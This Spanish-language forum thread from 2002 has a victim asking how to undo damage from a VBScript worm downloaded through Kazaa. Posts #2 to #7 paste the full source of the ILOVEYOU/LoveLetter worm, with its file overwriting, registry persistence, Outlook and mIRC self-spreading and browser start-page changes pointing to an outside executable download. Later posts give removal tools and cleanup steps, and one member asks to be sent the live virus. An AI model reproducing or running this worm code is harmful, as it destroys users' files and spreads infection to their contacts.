Ayuda Codigo Maldito VBscript

#1 (**permalink**) 13/06/2002, 19:27

Pues me lleva la que me trajo, resulta que estaba bien tranquilito bajando mp3s con el kazaa y no me di cuenta de que se habia bajado un archivo con la extensión .vbs (se supone que deje encendida la pc en la noche para que se bajaran mas MP3S) bueno, mi hermano es el encargado de moverlas a la carpeta correspondiente y testearlas, y creo que no sabia lo que era y lo ejecuto

y cambio todas las extensiones de todos mis mp3s (2570) y de las imagenes

en seguida les muestro el codigo, ojala y me ayuden a hacer algun archivo de "Vacuna" que revierta lo que este hizo...

Ayudenme por favor, no quiero hacer sentir mal a mi carnal por decirle que ejecuto un "virus" jeje, bueno pensandolo bien yo tengo la culpa por no haber chekado lo que se bajo con el kazaa.. :(

#2 (**permalink**) 13/06/2002, 19:31

Código:

 rem  barok -loveletter(vbe) &lt;i hate go to school&gt;
rem 			by: spyder  /  [email protected]  /  @GRAMMERSoft Group  /  Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=&quot;&quot;
ctr=0
Set fso = CreateObject(&quot;Scripting.FileSystemObject&quot;)
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject(&quot;WScript.Shell&quot;)
rr=wscr.RegRead(&quot;HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout&quot;)
if (rr&gt;=1) then
wscr.RegWrite &quot;HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout&quot;,0,&quot;REG_DWORD&quot;
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&amp;&quot;\MSKernel32.vbs&quot;)
c.Copy(dirwin&amp;&quot;\Win32DLL.vbs&quot;)
c.Copy(dirsystem&amp;&quot;\LOVE-LETTER-FOR-YOU.TXT.vbs&quot;)
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate &quot;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32&quot;,dirsystem&amp;&quot;\MSKernel32.vbs&quot;
regcreate &quot;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL&quot;,dirwin&amp;&quot;\Win32DLL.vbs&quot;
downread=&quot;&quot;
downread=regget(&quot;HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory&quot;)
if (downread=&quot;&quot;) then
downread=&quot;c:\&quot;
end if
if (fileexist(dirsystem&amp;&quot;\WinFAT32.exe&quot;)=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate &quot;HKCU\Software\Microsoft\Internet Explorer\Main\Start Page&quot;,&quot;http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe&quot;
elseif num = 2 then
regcreate &quot;HKCU\Software\Microsoft\Internet Explorer\Main\Start Page&quot;,&quot;http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe&quot;

#3 (**permalink**) 13/06/2002, 19:32

Código:

 elseif num = 4 then
regcreate &quot;HKCU\Software\Microsoft\Internet Explorer\Main\Start Page&quot;,&quot;http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe&quot;
end if
end if
if (fileexist(downread&amp;&quot;\WIN-BUGSFIX.exe&quot;)=0) then
regcreate &quot;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX&quot;,downread&amp;&quot;\WIN-BUGSFIX.exe&quot;
regcreate &quot;HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page&quot;,&quot;about:blank&quot;
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&amp;&quot;\&quot;)
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)  
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext=&quot;vbs&quot;) or (ext=&quot;vbe&quot;) then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext=&quot;js&quot;) or (ext=&quot;jse&quot;) or (ext=&quot;css&quot;) or (ext=&quot;wsh&quot;) or (ext=&quot;sct&quot;) or (ext=&quot;hta&quot;) then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&amp;&quot;\&quot;&amp;bname&amp;&quot;.vbs&quot;)
fso.DeleteFile(f1.path)
elseif(ext=&quot;jpg&quot;) or (ext=&quot;jpeg&quot;) then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&amp;&quot;.vbs&quot;)
fso.DeleteFile(f1.path)
elseif(ext=&quot;mp3&quot;) or (ext=&quot;mp2&quot;) then
set mp3=fso.CreateTextFile(f1.path&amp;&quot;.vbs&quot;)
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if

#4 (**permalink**) 13/06/2002, 19:33

if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&" \script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application ")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1

#5 (**permalink**) 13/06/2002, 19:36

regv=regedit.RegRead("HKEY_CURRENT_USER\Softw are\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Soft ware\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\&qu ot;&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\&qu ot;&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\&qu ot;&a,a.AddressEntries.Count
end if

#6 (**permalink**) 13/06/2002, 19:37

next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LO VELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? [email protected] ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY ONMOUSEOUT=@[email protected]=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@[email protected]=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> "&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
""&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit "&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@[email protected]@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf & _
"code2=replace(code,chr(91)&chr(45)&c hr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)& chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)& chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _

#7 (**permalink**) 13/06/2002, 19:38

"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@[email protected]@-@)"&vbcrlf& _
"regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),& quot;'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),&q uot;""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),&q uot;/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),&q uot;\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),& quot;'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),&q uot;""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),&q uot;/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),&q uot;\")
set fso=CreateObject("Scripting.FileSystemObject& quot;)
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+ch r(45)+chr(91))
lines(n)=replace(lines(n),"""" ,chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+ch r(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&v bcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub

AlZuwaga · #8 (**permalink**) 13/06/2002, 22:09

Bueno, claramente este mensaje no tiene nada que ver con ASP. Así que pasemos al foro "Seguridad y Redes -> Virus" ya que de eso se trata

saludos

wBktEaM · #9 (**permalink**) 14/06/2002, 01:27

ok por lo que puedo ver se trata de una variante del virus "I Love You", mmmm lo que tienes que hacer es bajar la vacuna especial para eliminar dicho virus, ya que la tengas la ejecutas y todo eso ya que tu sistema este libre del virus tienes que ejecutar un programilla que se llama "LBugMp3", este programa restaura todas las modificaciones hechas por dicho virus, ya que haigas hecho todo eso, todo quedara igual y problema resuelto !!!

Vacuna Especial: http://updates.pandasoftware.com/pq/gen/loveletter/pqremove.com

LBugMp3: http://www.megasecurity.org/Security/Lbugmp3.zip

Nota: serias tan amable de mandarme el virus a mi correo ??? mi email es [email protected]

<center><img src="http://galeon.com/wbk/lhz.gif" align="center" width="285" height="102"></center>

#10 (**permalink**) 14/06/2002, 17:26

Hey wasek eres fenomenal, jeje bueno en seguida me bajo los archivos y los ejecuto y también te mando el virus..

Ayer fui a tu web para ver si podia encontrar algo pero no encontre nada :( jiji pero bueno..

Daz, lo puse en el foro de ASP porque es VBSCRIPT pero bueno oks jejeje

Nos vemoX...

wBktEaM · #11 (**permalink**) 14/06/2002, 17:41

ya sabes Chente_Fox, aqui estoy para lo que pueda ayudar !!!

<center><img src="http://galeon.com/wbk/lhz.gif" align="center" width="285" height="102"></center>

#12 (**permalink**) 14/06/2002, 18:16

mm, bueno la vacuna solo sirvio para eliminar las entradas al registro hechas por el virus, pero no cambio nada jeje, ni el otro archivo, lo que estoy haciendo es buscar todos los archivos con extension .jpg.vbs y .mp3.vbs y los estoy borrando, ya que me di cuenta que lo que hizo este virus fue auto multiplicarse y tomar el nombre del archivo, y al original no lo toco solo lo oculto, fui a propiedades de carpeta y le di Ver archivos ocultos y me sale una copia de los originales pero con extension .mp.vbs ej.

vivir sin aire <-- Original
vivir sin aire.mp3.vbs <-- Virus, jejeje

En fin espero que esto ayude..

Nos vemoX...

Pd1. De todas formas deja acabo de borrar todito ya me falta poco y te mando el virus que lo atrape en un disco de 3 1/2 jejeje

Pd2. Estoy siguiendo el mismo procedimiento con las imagenes con extension .jpg.vbs

#13 (**permalink**) 14/06/2002, 20:59

mm, wasek no pude enviarte el virus porque el mcafee lo detecta :(

pero dime como te lo pudeo enviar ;)

Nos vemoX...

ceronne · #14 (**permalink**) 14/06/2002, 21:07

a la compu de una amiga le sucedió lo mismo, despues de muuuuuuuucho tiempo en asesoría online logramos quitar el virus, pero tengo una noticia mala........debido a todo el desmadre que hicimos no recuerdo bien como lo quitamos.

Si mi memoria no me falla apretó ctrl+alt+supr y ella encontró dos programas iguales.....elimina los dos de la ventana de las tareas.

Despues se fue a INICIO-RUN-MSCONFIG y eliminó de la pestaña INICIO todo lo que se viera sospechozo......inclusive creo que ahí aparecen uno o dos archivos .vbs

por último lo que hizo fue buscar en toda la compu todos los archivos .vbs y eliminar los que se vean sospechosos (aquellos que aparecian en el MSCONFIG).....

masterwww · #15 (**permalink**) 14/06/2002, 22:11

esta mamada de mensaje tenia virus, lastima que no pude copiar el mensaje, estas son puterias cabron ¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡

masterwww · #16 (**permalink**) 14/06/2002, 22:14

El archivo MENSAJE[12]htm ESTA INFECTADO POR vbs/lOVELETTER.WORM un virus

Ruta de archivo C:\WINDOWS\ARCHIVOS
TEMPORALES DE I...

Estado: infectado

wBktEaM · #17 (**permalink**) 15/06/2002, 04:30

hey Chente_Fox, pues la verdad no se que paso, yo he arreglado varias pc's siguiendo el procedimiento que te dije !!, pero en fin.

si no puedes mandar el virus por email, subelo a un server y lo bajo !!!

<center><img src="http://galeon.com/wbk/lhz.gif" align="center" width="285" height="102"></center>

#18 (**permalink**) 15/06/2002, 08:57

vavava jeje gracias chavos, lo de subirlo a un server creo que ahorita no sera posible, estare fuera todo el día así que en la nochesita lo subire ;) de todas formas ya acabe con el virus estube revisando la pc "a fondo" y no queda nada ;)

Nos vemoX... <IMG SRC="images/futbol.gif" WIDTH="15" HEIGHT="15" HSPACE="3">